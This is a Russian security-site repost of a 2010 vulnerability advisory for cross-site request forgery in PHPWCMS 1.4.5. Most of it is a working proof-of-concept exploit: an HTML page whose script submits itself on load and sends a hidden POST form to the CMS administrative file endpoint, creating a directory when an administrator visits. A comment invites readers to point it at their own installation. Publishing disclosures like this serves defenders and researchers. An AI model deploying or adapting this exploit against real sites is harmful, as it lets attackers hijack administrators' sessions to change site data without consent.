Информационная безопасность

Уведомление о безопасности: CSRF in PHPWCMS 1.4.5
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  ZDI-10-112: Novell Access Manager Arbitrary File Upload Remote Code Execution Vulnerability

  Apache Axis Session Fixation Vulnerability

  XSS vulnerability in Scribe  CMS

  XSS vulnerability in Scribe  CMS

From:labs_(at)_redteamsecure.com <labs_(at)_redteamsecure.com>
Date:23 июня 2010 г.
Subject:CSRF in PHPWCMS 1.4.5

<?php
       /*
               Exploit Title: PHPWCMS Cross-Site Request Forgery Vulnerability
               Date: 06/16/2010
               Author: Jeremiah Talamantes
               Software Link: http://phpwcms.googlecode.com/files/phpwcms_r398.zip
               Version: 1.4.5 r398
               Tested on: WinXP SP2 (EN) on WAMP 2.0
               CVE: N/A
               
               Jeremiah Talamantes
               RedTeam Security (RedTeam Labs)
               http://www.redteamsecure.com/labs
               
               Description:
               A vulnerability has been identified in PHPWCMS, which could be exploited to conduct
cross-site request forgery attacks.
               This issue is caused due to input validation errors in the administrative interface when
processing HTTP requests,
               which could be exploited by attackers to manipulate certain data by tricking an
administrator into visiting a malicious web page.
       */
?>
<html>
<head>
       <title>PHPWCMS 1.4.5 r389 Cross Site Request Forgery</title>
       <script type="text/javascript">
               function myfunc () {
                       var frm = document.getElementById("csrf");
                       frm.submit();
               }
               window.onload = myfunc;
       </script>
</head>
<body>
       <!-- Modify the form action parameter to suit your installation -->
       <form id="csrf" name="csrf" method="POST"
action="http://localhost/phpwcms/phpwcms.php?do=files&f=0">
               <input type="hidden" name="dir_newname" value="Game Over!" />
               <input type="hidden" name="dir_gallery" value="0" />
               <input type="hidden" name="dir_sort" value="0" />
               <input type="hidden" name="dir_aktiv" value="1" />
               <input type="hidden" name="dir_public" value="1" />
               <input type="hidden" name="dir_pid" value="0" />
               <input type="hidden" name="dir_aktion" value="1" />
       </form>
</body>
</html>
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server